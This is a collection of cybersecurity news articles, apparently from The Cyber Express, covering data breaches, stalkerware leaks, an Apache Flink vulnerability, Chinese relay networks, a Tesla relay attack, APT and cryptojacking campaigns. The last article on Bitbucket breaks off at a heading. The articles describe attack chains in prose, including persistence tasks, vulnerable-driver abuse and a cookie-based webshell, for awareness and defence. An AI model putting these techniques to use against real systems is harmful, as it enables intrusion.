Opposition parties are now demanding the resignation of Interior Minister Niki Kerameos following the outcome of the investigation into the unsolicited emails. [caption id="attachment_71241" align="alignnone" width="1000"] Source: Shuttertock (Interior Minister Niki Kerameos)[/caption] The main opposition party SYRIZA released a statement asserting that “private data were being passed around for months among the Interior Ministry, ND, and at least one election candidate,” questioning whether the email list had been leaked to other New Democracy candidates by the Interior Ministry. While the Interior Minister might not have been directly involved, SYRIZA claimed that “Kerameos did not have the guts to show up at the Committee on Institutions and Transparency.” The Socialist PASOK Party also demanded Kerameos’ resignation, adding that the violation demonstrates the government as “incapable of fulfilling the self-evident, as proven by the high fines.” Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

Islamabad's Safe City Authority experienced a significant disruption when its online system was breached by hackers, prompting an immediate shutdown. The Safe City Islamabad Project, initiated by the PPP-led government and backed by a Chinese government concessional loan, aimed to enhance the capital's surveillance and security capabilities with the installation of 1,950 CCTV cameras, a bomb-proof command center, a 4G communication network, and advanced monitoring systems such as facial recognition technology. This unforeseen event has raised concerns over the security and the vulnerability of the system, as law enforcement officials scramble to assess the damage and restore operations.

Islamabad's Safe City Authority Breach and Initial Response

The breach revealed several systemic weaknesses within the Safe City Authority's digital infrastructure. Hackers successfully infiltrated the primary server, gaining unauthorized access to databases containing criminal records and sensitive information. While the system's firewall did issue an alert upon detecting the intrusion, the absence of backup servers and contingency plans forced a complete shutdown of the affected software and applications. The assault compromised several integral systems, including the Complaint Management System, Criminal Management Record System, and Human Resource Management System, along with software and applications vital for the Operation Division. [caption id="attachment_70433" align="alignnone" width="2800"] Source: china.aiddata.org[/caption] The compromise of these systems impacted several critical services tied to the Safe City initiative. This includes mobile applications, smart police vehicle records, police station data, video analytics, Islamabad Traffic Police, e-challan systems, and records from the operations division. Approximately 13 to 15 servers provided by the police facilitation center F-6 were also affected. An officer highlighted to Dawn, Pakistan's largest English newspaper, that this incident was not a typical hacking scenario involving stolen login credentials. Instead, the system's vulnerability stemmed from the use of simple and common login IDs and passwords by officials, making it easier for hackers to gain access. Additionally, many of the software and applications were found to be outdated or with expired licenses, further compromising the system's security. Despite the breach of several systems, the Safe City cameras' management system that operated independently through offline direct lines, remained secure, demonstrating the effectiveness of isolated systems in safeguarding against such attacks. Police spokesperson Taqi Jawad confirmed the intrusion as an attempted breach that triggered the firewall's alarm but stated that appropriate precautionary measures had been taken. "All logins have been closed for the past two days to change them, including those of police stations and officers at various ranks," he stated. Jawad refrained from sharing further specifics on the server shutdowns as he stated they were still pending technical feedback

Controversy Over Islamabad's Safe City Authority

Islamabad's Safe City project has been a source of serious controversy, with several litigations over contract transparency and cost inflation, leading the Supreme Court's order to cancel the initial contract with Huawei in 2012. The contract was later renegotiated, and the project resumed under the PMLN (Pakistan Muslim League)  government, with the command center becoming operational in 2016. By 2016, 1,805 cameras were installed, and as of 2021, 95% remained functional. Despite the extensive infrastructure, police sources claimed in 2022 that the system had not prevented any incidents or facilitated any arrests, raising questions about its effectiveness. Due to financial strain, Pakistan and China Eximbank signed several debt suspension agreements from July 2020 to December 2021, temporarily suspending principal and interest payments under the concessional loan agreement. Tragically, the project's director was found dead in July 2022 in an apparent suicide. The successful breach of the authority's systems draws additional controversy towards the project, which was intended to be a cornerstone of Islamabad's security infrastructure but has encountered several operational, legal, and financial setbacks. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

Optus, one of Australia's largest telecommunications companies, has lost a legal battle in the Federal Court. The Australian Federal Court has ordered the company to release an external review performed by Deloitte to investigate the cause of a significant 2022 cyberattack that led to the release of sensitive customer data. The Optus 2022 data breach resulted in the exposure of the names, dates of birth, phone numbers, and email addresses of over 10 million customers with addresses, driver's licence or passport numbers being exposed for a portion of the affected customers.

Optus Appeal Against Sharing External Deloitte Report

The data breach incident along with 14-hour outage of its telecommunication services, frustrations over the availability of information/credit monitoring services and attempts of attackers to exploit the compromised data for use in SMS phishing attacks, led to intense scrutiny towards the company. [caption id="attachment_70354" align="alignnone" width="2230"] Source: www.optus.com.au/support/cyberresponse[/caption] The company commissioned an independent external forensic review of the cyberattack from Deloitte over its security systems, controls and processes under the advise of the then CEO Kelly Bayer Rosmarin and the approval of its board. Bayer made the following statement over the decision:

“This review will help ensure we understand how it occurred and how we can prevent it from occurring again. It will help inform the response to the incident for Optus. This may also help others in the private and public sector where sensitive data is held and risk of cyberattack exists.

Kelly, later resigned over the incident with Optus now being led by a new CEO, who is working to rebuild trust with customers in a 'challenging' market. Despite the efforts of the company to deal with the data breach, the recent court decision comes after Optus appealed an earlier ruling that it must hand over the report to Slater & Gordon, the law firm pursuing a class action against the company for allegedly failing to protect its customers' personal information. Optus has not yet made a public statement regarding the Federal Court's decision. However, the company had previously argued that the Deloitte report was commissioned to provide legal advice and therefore it was privileged. The court, however, decided that Optus had failed to prove that the dominant purpose of the report was for legal advice.

Class Action Law Suit Against Optus and Implications of Court Ruling

Slater & Gordon, the law firm representing the affected Optus customers, has welcomed the court's decision. The law firm's class actions practice group leader, Ben Hardwick, criticized Optus's efforts to keep the report confidential, stating that it indicates the company's refusal to accept responsibility for its role in the data breach and its impact on millions of its customers. In it's April 2023 press release, the law firm's leader had stated that more than 100,000 of Optus’s current and former customers had registered for the class action, with some notable examples among the group group such as:

• a domestic violence victim who spent money that was intended for counselling for her children on increasing security measures around the house, including installing video cameras and extra locks on doors and windows

• a former Optus customer who had previously been burgled and had his identity stolen who now suffers severe anxiety after learning his personal information had been shared online

• a stalking victim who takes extreme measure to maintain her privacy, especially her address, who fears her life has genuinely been put in danger by the data breach

• a woman who is now too fearful to answer the telephone after noticing an increase in scam phone calls following the Optus cyberattack, and

• a retired police officer concerned that his home address may have been shared with criminals he was involved in the prosecution and incarceration of.

The press release also cited the frustration several customers expressed over alleged delays by Optus in providing details over the data breach, and reported inconsistencies in how the telecommunications giant had been treating affected customers Some Optus registrants claimed to the law firm that they were dismissed when they sought further information from Optus, while others informed that the company refused to pay for credit monitoring services under the basis that they were no longer Optus customers. “There appears to have been a piecemeal response from Optus, rather than a coordinated approach that made sure everyone whose data was compromised is treated the same." The Federal Court's decision sets a significant precedent for companies involved in data breaches. It underscores the importance of transparency and accountability in such situations, and it may encourage other companies to take stronger measures to protect their customers' personal information. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

Soon after an independent researcher exposed a vulnerability in the commercial-grade pcTattletale spyware tool that could compromise recordings, the tool’s website was hacked and defaced. The hacker claimed to have accessed at least 17TB of victim screenshots and other sensitive data, viewing the site's hacking as a personal challenge after a researcher's limited disclosure to prevent exploitation of the flaw by bad actors. Amazon promptly placed an official lock on the site's AWS infrastructure following the hacking incident. The pcTattletale spyware's flawed architecture and its discovery demonstrate the inherent vulnerabilities present in common spyware applications, potentially impacting not just individuals but entire organizations and families.

pcTattletale Spyware Vulnerabilities and Poor-Data Handling Practices

The pcTattletale spyware tool offered a live feed of screenshots from the victim's device as its primary feature, alongside typical spyware functionalities like location tracking. However, this extensive monitoring feature backed on poor infrastructure and data-handling practices has also been its downfall, with data breaches exposing private data of targets. First, a 2021 data breach incident demonstrated Individual Directory Override (IDOR) vulnerabilities in the spyware tool's domain infrastructure, potentially allowing access to sensitive data through guessable Amazon S3 URLs. Last week, researcher Eric Daigle uncovered an API bug that also potentially allowed access to sensitive data across registered devices. This vulnerability allowed unauthorized users to access private information in the form of comprehensive screen recordings. A subsequent hack then exposed pcTattletale's backend to the public, revealing an astonishing disregard for secure practices. The hacker discovered that the spyware shipped with hardcoded AWS credentials, accessible via a hidden webshell, potentially enabling years of undetected data exfiltration. This oversight, remarkable for its simplicity and duration, underscores a major failure in the handling of user data.

pcTattletale Spyware Latest Hack

The hacker defaced pcTattletale's official site, replacing it with a writeup of the operation and links to compromised data obtained from the site's AWS infrastructure. The vastness of the data stored by pcTattletale was found to be overwhelming, with the hacker reporting their discovery of over 17 terabytes of victim device screenshots from more than 10,000 devices, some dating back to 2018. Although the released data dump did not include these screenshots, it reportedly contained database dumps, full webroot files for the stalkerware service, and other S3 bucket contents, exposing years of sensitive information.   [caption id="attachment_70264" align="alignnone" width="2230"] Source: archive.org[/caption] The breach also uncovered a simple webshell hidden since at least December 2011 in the spyware's backend code. This backdoor allowed for arbitrary PHP code execution through the use of cookies, raising questions about its origin—whether it was placed by pcTattletale itself as a backdoor or a threat actor. The hacker later updated the defaced site to share a video, claiming it as footage of the pcTattletale's founder attempts to restore the site. It took over 20 hours for the defaced website to be taken down, with the pcTattletale’s service continuing to send screenshots to the S3 bucket until Amazon officially locked down the spyware service's AWS account. [caption id="attachment_70324" align="alignnone" width="1206"] Source: ericdaigle.ca[/caption] Following the official lockdown of the site's AWS infrastucture, security researcher Eric Daigle, expanded his earlier limited disclosure with step-by-step exploit of the stated flaw. He noted that while the site's attacker exploited an unrelated flaw, it was about as equally trivial in it's complexity.

Victims Affected by pcTattletale Spyware Data Leak

The pcTattletale data leak is particularly alarming as several organizations employed the tool to monitor employees and clients, exposing confidential information across various sectors, such as banks, law firms, educational institutes, healthcare providers, and even government agencies. Notable instances of victims affected by the data breach as stated by security researcher maia crimew who explored the incident and shared data in a blog article, include:

• Hotels leaking guest information such as personal data and credit card details.
• Law firms exposing lawyer-client communications and client bank-routing information
• A bank revealing confidential client data
• Educational institutes such as schools and childcare centers monitoring employees or students, revealing personal data.
• Healthcare providers exposing patient information.
• Palestinian government agency employee monitored.
• The HR department of a Boeing supplier revealing personal information of employees .
• Tech companies secretly installing pcTattletale on employee devices suspected of wrongdoing, exposing internal systems and source code.
• A bug bounty hunter who installed the software for pentesting, then immediately tried to uninstall it.

Concerningly, the spyware was also offered as a way for parents and spouses to maintain tabs over their children and partners respectively, potentially exposing this information in the resulting breach. [caption id="attachment_70278" align="alignnone" width="1920"] Source: maia.crimew.gay[/caption] Given the wide range of affected companies and the significant security lapses, security researcher maia crimew noted that pcTattletale could face severe repercussions, possibly leading to a cessation of its operations as the Federal Trade Commission (FTC) had previously ordered other US stalkerware developers to cease operations following breaches, with pcTattletale’s case poised for similar consequences. The widespread misuse and systemic security failures of pcTattletale highlight the dangers inherent in stalkerware software and services, as well as the urgent need for stringent regulatory oversight and robust security measures over these tools to protect the data and privacy of individuals and organizations. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

An independent researcher claims that commercial grade spyware tool pcTattletale was found to leak live-screen recordings/screenshots to the internet, making it accessible by anyone and not just the app's intended users. The pcTattletale stalkerware sees wide usage and has been discovered on hotel guest check-in computers, corporate systems and computers employed by law firms across the United States. The app promotes itself with parents, spouses/partners and enterprises with the promise of discrete instant real-time monitoring and easy installation.

pcTattletale Stalkerware Reportedly Leaks Screen Recordings

The pcTattletale spyware tool primarily focuses on advertising itself towards parents concerned over the social media usage of their children and businesses aiming to monitor employees, claiming to offer a window into the online world of children and disruptions to the daily workflow of employees. The tool is available for installation on both Windows and Android operating systems. While the site claims this tracking is safe, Eric Daigle, an independent security researcher claims to have discovered a flaw in the spyware's API that allows attackers to obtain the most recent screen capture on devices with the tool installed. Reached by the Cyber Express Team, Daigle shed some additional details on the purported vulnerability. The researcher said the tool allows users to sign up on the website, after which they are granted custom .exe or .apk files to install on the target's device. The customized file is hardcoded with the users' credentials, Daigle said, simplifying the installation process to essentially two clicks, with the only real other input the acceptance of permission requests required to successfully capture the screen. After the installation process, the spyware's user can access their accounts on the website to trigger or access screen captures. However, Daigle said the recordings he observed weren't a video file but static screenshots taken a few seconds apart, which are stitched together and played in the form of .GIF file to produce the desired recording of the target. Daigle said many U.S. hotels, corporate computers and at least two law firms appeared to be compromised and vulnerable to the flaw. However, the researcher expressed his desire to keep further details about victims anonymous for privacy purposes, along with details on exploiting the flaw to prevent potential attackers from taking advantage. However, the researcher was unclear if the software was installed by corporate owners, as advertised as a use case on the pcTattletale website, or if the installation was done by other actors. The researcher highlighted the serious consequences and potential impact of leaking live screen recordings, such as the leak of sensitive personal information, financial information, or the capture of passwords. The researcher said he had contacted the spyware vendor about the vulnerability but was ignored. He indicated that he would be ready to do a full write-up of the flaw once it had been patched. The pcTattletale site appeared to be down at the time of publishing this article

Spyware/Stalkerware Tools Remain a Major Concern

Spyware tools pose serious inherent risks aside from their intended purposes, as they could be exploited to violate the privacy of all kinds of individuals or groups. In 2023, researchers observed a Spanish spyware vendor's tools employing multiple zero-days and n-days in its exploit chain, and delivering the spyware module through the use of one-time links in SMS messages. These tools were used against targets in the United Arab Emirates (UAE). Last month, Apple issued notifications to users in 92 different countries to alert them of mercenary spyware attacks. In the same month, the United States government issued several visa restrictions on individuals identified with being connected to or profiting from the usage/proliferation of commercial spyware. In its notice, the U.S. government cited its concerns over the usage of these apps to facilitate human rights abuses or counter-intelligence efforts as justification for the issue of these restrictions. Several of these concerns are also shared by privacy-advocating individuals, groups such as the Coalition Against Stalkerware and non-profit organizations such as the U.S. National Cybersecurity Alliance. The National Cybersecurity Alliance defines the use of these tools against targets as a form of abuse on its Stay Safe Online website. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has recently added a four-year-old security flaw affecting Apache Flink to its Known Exploited Vulnerabilities (KEV) catalog, following evidence of active exploitation. The flaw, tracked as CVE-2020-17519, poses significant risks due to improper access control, allowing unauthorized access to sensitive information.

Researchers Observed Active Exploitation of Apache Flink Vulnerability

CISA describes vulnerabilities such as the Apache Flink Vulnerability which have been added to its Known Exploited Vulnerabilities catalog as "frequent attack vectors for malicious cyber actors" and as posing significant risks to the federal enterprise. The catalog serves as a critical resource for identifying and mitigating vulnerabilities actively in use. CVE-2020-17519 is a critical vulnerability in Apache Flink, an open-source framework for stream-processing and batch-processing. The flaw arises from improper access control in versions 1.11.0, 1.11.1, and 1.11.2 of the framework, potentially enabling remote attackers to access files specific to the local JobManager filesystem through the use of specially crafted directory traversal requests, leading to unauthorized access. While precise details of ongoing campaigns exploiting the Apache Flink Vulnerability remain unclear, the bug has existed for at least four years and has been acknowledged by a project maintainer. The project Apache Flink thread states:

A change introduced in Apache Flink 1.11.0 (and released in 1.11.1 and 1.11.2 as well) allows attackers to read any file on the local filesystem of the JobManager through the REST interface of the JobManager process. Access is restricted to files accessible by the JobManager process.

The discovery of the vulnerability was credited to "0rich1" from Ant Security FG Lab, with working exploit code of the vulnerability available on the public web. In the same year, researchers from Palo Alto Networks had observed the vulnerability among the most commonly exploited vulnerabilities during the Winter 2020 period using information collected between November 2020 and January 2021.

Mitigation Measures and Binding Directives

The Apache Software Foundation addressed this issue in January 2021 with the release of Flink versions 1.11.3 and 1.12.0 to the master branch of the project. Users running affected versions are strongly urged to upgrade to these versions to secure their systems. CISA has mandated federal agencies to apply necessary patches by June 13, 2024. This directive operates under the Binding Operational Directive (BOD) which requires Federal Civilian Executive Branch (FCEB) agencies to implement fixes for listings in the Known Exploited Vulnerabilities Catalog to protect agency networks against active threats. Although the directive only applies to FCEB agencies, CISA has urged all organizations to reduce their exposure to cyberattacks through applying the mitigations in the catalog as per vendor instructions or to discontinue the use of affected products if mitigations are unavailable. In 2022, a critical vulnerability discovered in Apache Commons Text potentially granted threat actors access to remote servers. While fixes were soon released for both vulnerabilities, these incidents highlight the importance of timely updates and patches for vulnerabilities present in widely deployed open-source projects, frameworks and components. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

An unknown ransomware actor has compromised the personally identifiable data of more than 50,000 Californian school administrators, their association told Maine's Attorney General in a breach notice. The Association of California School Administrators (ACSA), the largest association for school leaders in the United States, said it spotted the data breach in September 2023, when an unauthorized actor accessed and potentially exfiltrated sensitive data.

Association of California School Administrators Ransomware Attack Investigation

The association's notice to the Maine Attorney General revealed that it had first detected "encryption activity" indicative of a ransomware attack in it's computer environment on September 24, last year. No threat group has yet claimed responsibility for the attack. This detection was followed by an investigation, aided by third-party cybersecurity experts who confirmed unauthorized access to various ACSA systems over two days after the initial access. The threat actor was found to have potentially accessed and stolen sensitive data from the compromised systems. The association also worked to validate the results of the investigation and locate missing address information. After ACSA completed the process of validating and identifiying affected individuals on May 3, 2024, it then took up the task of notifying all potentially affected individuals on May 22. ACSA informed the Maine Attorney General that approximately 54,600 individuals were impacted by the incident, including 14 Maine residents. Individuals impacted by the breach were provided with specific details about the incident and the steps they could take to protect their personal information. The compromised files were found to contain sensitive data such as names, addresses, dates of birth, Social Security numbers, driver's license numbers, payment card information, medical information, health insurance details, tax IDs, student records (report cards and test scores), employer-assigned identification numbers, and online account credentials.

Recommendations and Additional Resources to Affected Individuals

In response to the breach, ACSA began notifying federal law enforcement, implemented additional security measures such as training of its employees, and provided relevant guidance to the affected individuals on protecting themselves from associated risks such as identity theft and fraud. The association stated that there was no evidence of identity theft or fraud resulting from the event. However, as a precautionary measure, it is offering credit monitoring services for 12 months to the affected individuals at no cost. These services include credit and CyberScan monitoring, a million-dollar insurance reimbursement policy, and fully managed identity theft recovery services. ACSA encouraged affected individuals to opt for enrolment into these services before the deadline set for August 22, 2024. ACSA advises all affected individuals to monitor their accounts and credit reports for any unauthorized activity, stating that it took the privacy and security of sensitive information within its care seriously and regretted any inconvenience stemming from the incident to individuals. The guidance also offered instructions on reporting suspicious activity to banks and credit card companies, placing fraud alerts and credit freezes on credit files, and obtaining free credit reports available under U.S. law. ACSA is also encouraging individuals to contact the Federal Trade Commission, state attorneys general, and law enforcement to report any incidents of identity theft. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

Cybersecurity defenders have widely relied on blocking attacker IP addresses through identified IOCs in response to threat actor campaigns. However, Chinese threat actors are rapidly rendering this usual strategy obsolete through the widespread adoption of ORB Networks. ORBs are complex, multi-layered networks, typically managed by private companies or entities within the Chinese government. They offer access to a constantly shifting pool of IP addresses, allowing multiple threat actors to mask their activities behind seemingly innocuous traffic.

Use of ORB Networks by Threat Actors Present Additional Challenges to Defenders

Researchers from Mandiant stated that the sheer size and scope of these networks, often hundreds of thousands of nodes deep, provide a great deal of cover and make it difficult for defenders to attribute and learn more about attackers. Additionally, the geographic spread of ORBs allows hackers in China to circumvent geographic restrictions or appear less suspicious by connecting to targets from within their own region. Most importantly, ORB nodes are short-lived, with new devices typically cycled in and out every month or few months, making it difficult for defenders to tie IPs to their users for any good amounts of time. These operational relay box networks (ORBs) are maintained by private companies or elements within the Chinese government and are made up of five layers: Chinese servers, virtual private servers (VPS), traversal nodes, exit nodes, and victim servers. ORBs can be classified into two groups: provisioned, which use commercially rented VPS's, and nonprovisioned, built on compromised and end-of-life routers and Internet of Things (IoT) devices. These networks are akin to botnets and ORB network administrators can easily grow the size of their network with little effort and create a constantly evolving mesh network that can be used to conceal espionage operations. The researchers cited two prominent examples to illustrate the sophistication of these networks:

• ORB3/SPACEHOP: A provisioned network linked to APT5 and APT15, targeting entities in North America, Europe, and the Middle East. Known for exploiting vulnerabilities like CVE-2022-27518.
• ORB2/FLORAHOX: A hybrid network employing compromised Cisco, ASUS, and DrayTek routers, alongside TOR network relays and VPS servers. Linked to APT31 and Zirconium, demonstrating a multi-layered approach to traffic obfuscation.

Adapting to the Threat of ORB Networks

Researchers have advised that instead of simply blocking adversary infrastructure, defenders must now consider temporality, multiplicity of adversaries, and ephemerality. They recommend approaching these ORB networks as distinct entities with distinct tactics, techniques, and procedures (TTPs) rather than the use of inert indicators of compromise. By analyzing their evolving characteristics - including infrastructure patterns, behaviors, and TTPs - defenders can gain valuable insights into the adversary's tactics and develop more effective defenses. While leveraging proxy networks for attack obfuscation isn't new, the rise of the ORB network industry in China points to long-term investments in equipping cyber operators with more sophisticated tactics and tools. The evolution of these ORBs networks also highlight that a static defense may be a losing defense. To counter this growing threat and level the playing field, enterprises must embrace a mindset of continuous adaptation, while investing in advanced threat intelligence, behavioral analysis tools, and skilled personnel. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

A new study reveals that Tesla's keyless entry system in its latest Model 3 remains vulnerable to relay attacks despite its upgrade to ultra-wideband (UWB) radio which had been touted as a solution to relay attacks. A relay attack tricks a car into unlocking by relaying signals from an owner's key fob or smartphone, often from a distance. This technique has been used to steal numerous car models for years as it tricks cars entry systems to respond as if the real owner was nearby.

Relay Attacks Remain a Concern for Ultra-Wideband Keyless Systems

For over a decade, car thieves have used relay attacks to steal vehicles with keyless entry systems. This technique, which requires minimal equipment, has remained a significant threat despite advancements in car security technology. The ultra-wideband technology was touted by some as a supposed fix and possible end to these relay attacks, with a pending patent filed by Ford Global Technologies LLC (an R&D subsidiary of Ford Motor) describing it as 'most advanced known solution to relay attacks'. [caption id="attachment_69869" align="alignnone" width="1034"] Source: patents.google.com[/caption] However, recent research from cybersecurity firm GoGoByte reveals that some of the latest high-end cars such as the Tesla Model 3 incorporating the ultra-wideband technology, remain vulnerable.The researchers, demonstrated a successful relay attack against the latest Tesla Model 3 despite its UWB upgrade, using less than $100 worth of radio equipment to unlock the car instantly. This vulnerability is particularly concerning as the keyless entry system also controls the car immobilizer that prevents engines from starting until the right key is recognized, potentially allowing an attacker to drive away with the car when successfully compromised.

PIN-to-Drive Feature Advised as Critical Safeguard

In 2021, documents supposedly originating from a Tesla filing to the US Federal Communications Commission, detailed the implementation of the ultra-wideband technology and described it as immune to relay attacks. However, the founder of the cybersecurity firm emphasized the importance of enabling Tesla's optional PIN-to-drive feature. When enabled, this option requires a four-digit security code to be entered before starting the car, serving as a crucial defense against relay attacks. According to the Wired report, Tesla responded to an email of the researcher's findings by acknowledging the issue but stated that the behavior was as expected and the ultra-wideband technology was not intended to stop relay attacks or intended to prevent car theft. The automotive company stated that it was working on improving the reliability of the technology and that ranging enforcements would be implemented when reliability upgrades were completed. The researchers noted that at least two other carmakers implementing the technology in their cars, also faced the same vulnerability. Noting the ability of Tesla to push over-the-air(OTA) updates to to its cars, the researchers stated that a future update could possibly contain a fix to deal with relay attacks. However, the researchers expressed their belief that the public should be aware of this issue while realizing they were far from immune until then. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

A recently discovered cyber threat actor, dubbed 'Unfading Sea Haze', has been targeting organizations in the South China Sea region since 2018. The threat actor group remained undetected for over five years, despite its attacks on several high-profile military and government entities. Researchers observed that its operations align with Chinese geopolitical interests in the region.

Unfading Sea Nations Likely Affiliated with Chinese Government

Bitdefender researchers discovered that the group's TTPs (tactics, techniques, and procedures) and toolset overlaps with that of other Chinese state-sponsored threat actors such as APT41 (BARIUM). Unfading Sea Haze employs a multi-stage attack chain, often beginning with spear-phishing emails carrying malicious LNK files disguised within seemingly innocuous documents. Upon clicking these LNK files, a lengthy obfuscated PowerShell command checks for the presence of an ESET executable (ekrn.exe). If found, the attack halts; otherwise, the PowerShell script directly compiles malware into Windows memory using Microsoft's legitimate msbuild.exe command-line compiler. The attackers use scheduled tasks to side-load malicious DLLs and modify the disabled default administrator account to maintain persistence. They reset the password for the local administrator account, enable it, and hide it from the login screen via Registry modifications. This step provides the threat actors with a hidden administrator account for further attacks. Once access is established, Unfading Sea Haze uses a custom keylogger named 'xkeylog' to capture keystrokes, an browser-data stealer to target data stored in Chrome, Firefox, or Edge browsers, along with various PowerShell scripts to extract information from browser databases. Unfading Sea Haze's campaign employs a wide arsenal of custom-developed malware and publicly available tools. The group's initial campaigns involved the use of tools such as the xkeylog keylogger for credential theft and SharpJSHandler, a web shell alternative for remote code execution. The group later shifted towards the use of stealthier options, such as iterations of the Gh0st RAT malware family including SilentGh0st, TranslucentGh0st, and newer, more modular variants like FluffyGh0st, InsidiousGh0st, and EtherealGh0st. This recent shift demonstrates an ongoing effort to adapt their toolkit for maximum effectiveness and evasion. Unfading Sea Haze also uses commercial Remote Monitoring and Management (RMM) tools, such as Itarian RMM, in the attack chain to establish a foothold on compromised networks.

Unfading Haze Shares Similarities with APT41

Adding to the concern, the investigation revealed Unfading Sea Haze's repeated success in regaining access to previously compromised systems. This persistence points to a critical vulnerability often exploited by malicious actors: poor credential hygiene and inadequate patching practices within targeted organizations. Researchers suggest the use of various Gh0st RAT variants by the Unfading Sea Haze group could imply a close connection to the Chinese threat actor ecosystem, where the sharing of closed-source RATs and tools is common among state-sponsored actors. The campaign's integration of the SharpJSHandler module to execute script shares similarities with the invoke command found in the funnyswitch backdoor, which has been frequently employed by APT41 in its campaigns. Both SharpJSHandler and funnyswitch load .NET assemblies and execute JScript code. However, these similarities are limited, as funnyswitch contains additional features not present in SharpJSHandler. No further overlaps with APT41's tooling were discovered during the investigation.

Researchers Share Recommendations

Researchers note that the Unfading Sea Haze group has demonstrated a high level of sophistication in their attacks, with the usage of a custom malware arsenal for additional flexibility and evasiveness. The shift towards modularity, dynamic elements, and in-memory execution indicates the group's continuous efforts to circumvent traditional security measures. As attackers persistently adapt their tactics, researchers have recommended a comprehensive and layered security approach for likely victims. This includes prioritizing vulnerability management, implementation of strong authentication techniques, network segmentation, traffic monitoring and effective logging. Researchers have also shared IOC (Indicator of Compromise) information on the campaign such as associated IP addresses, domains used, MD5 file hashes and storage file paths. Additionally the researchers have linked to a full report featuring an in-depth look at the Gh0st RAT family and other malware samples. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

Cybersecurity researchers uncovered a sophisticated cryptojacking campaign that leverages vulnerable drivers to disable well-known security solutions, thereby evading detection. This technique that allows attackers to perform privileged actions through the exploit of known flaws in signed drivers is referred to as a Bring Your Own Vulnerable Driver (BYOVD) attack.

Campaign Deploys GHOSTENGINE Payload

Researchers from Elastic Security Labs identified the new cryptojacking campaign referred to it as REF4578. The campaign uses the GHOSTENGINE core payload to deactivate security tools, complete the initial infection, and execute a crypto-miner. Researchers from Antiy Labs also observed the campaign, referring to it as HIDDEN SHOVEL. The campaign was found to primarily target servers in China, with significant impacts also reported in Hong Kong, the Netherlands, Japan, the U.S., Germany, South Africa, and Sweden. The exact scope and the identities of the threat actors behind the campaign remain unknown. The attack begins with the execution of an executable file named "Tiworker.exe," which masquerades as a legitimate Windows file. This executable runs a PowerShell script that retrieves an obfuscated script called "get.png" from the attacker's command-and-control (C2) server. The "get.png" script then attempts several actions such as disabling Microsoft Defender Antivirus, clearing Windows System/Security event logs and creating scheduled tasks for continued persistence. The script also checks for a minimum of 10MB storage space before downloading additional malicious modules, including:

• aswArPot.sys: A vulnerable Avast driver used to terminate EDR processes.
• IObitUnlockers.sys: A vulnerable IObit driver used to delete security agent binaries.
• smartsscreen.exe: The core payload (GHOSTENGINE) responsible for deactivating security processes and executing the XMRig miner.
• oci.dll: A DLL used for persistence and updating the malware.
• backup.png: A PowerShell script functioning as a backdoor for remote command execution.
• kill.png: A PowerShell script designed to inject and load an executable file to delete security agents.

The PowerShell script creates multiple scheduled tasks to ensure persistence:

• "OneDriveCloudSync" runs a malicious service DLL every 20 minutes.
• "DefaultBrowserUpdate" runs a batch script every hour.
• "OneDriveCloudBackup" executes "smartsscreen.exe" every 40 minutes.

Subsequently, the XMRig miner is downloaded and executed to mine cryptocurrency. XMRig is a legitimate high-performance open-source application able to mine the monero cryptocurrency and is commonly used by threat actors. A configuration file directs all generated cryptocurrency to an attacker-controlled wallet. The campaign incorporates several fallback mechanisms to ensure continued operation. If the primary C2 domains are unavailable, it uses backup servers and an FTP-based fallback system. The PowerShell script "kill.png" provides redundancy by having similar capabilities as "smartsscreen.exe" to delete security agent binaries. The malware also uses a DLL file ("oci.dll") loaded by a Windows service to maintain additional persistence and download further updates from the C2 server.

Attackers Employ BYOVD Technique To Escalate Privileges and Evade Detection

The drivers exploited in the campaign run at ring 0, the highest level of privilege offered in the operating system, allowing for direct access to critical system resources. The threat actors exploit the Avast driver "aswArPot.sys" to terminate security processes and the IObit driver "IObitUnlockers.sys" to delete security agent binaries. As the attack evades Endpoint Detection and Response (EDR) systems, to defend against this sophisticated campaign, security teams should monitor for unusual PowerShell execution, suspicious process activities and network traffic pointing to the identified crypto-mining pools. The researchers have provided YARA rules to help identify GHOSTENGINE infections. Additionally, organizations should consider blocking the creation of files by vulnerable drivers such as "aswArPot.sys" and "IObitUnlockers.sys." The advanced level of sophistication demonstrated in the REF4578/HIDDEN SHOVEL cryptojacking campaign makes it a cause of concern and demands urgent remediate action. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

Researchers discovered that a flaw in Atlassian's Bitbucket code repository tool, allowed threat actors to successfully breach AWS accounts through the use of authentication secrets which were leaked as plaintext in Bitbucket artifacts. Bitbucket provides a way to store variables, allowing developers to quickly reference them when writing code. Administrators can also set variables as "secured" as part of the Bitbucket Pipelines to prevent their values from being read in plain text. However, the recently discovered flaw in this system could cause artifact objects generated during pipeline runs to expose these secured variables in plaintext format.

BitBucket Artifacts Contain Secrets in Plaintext

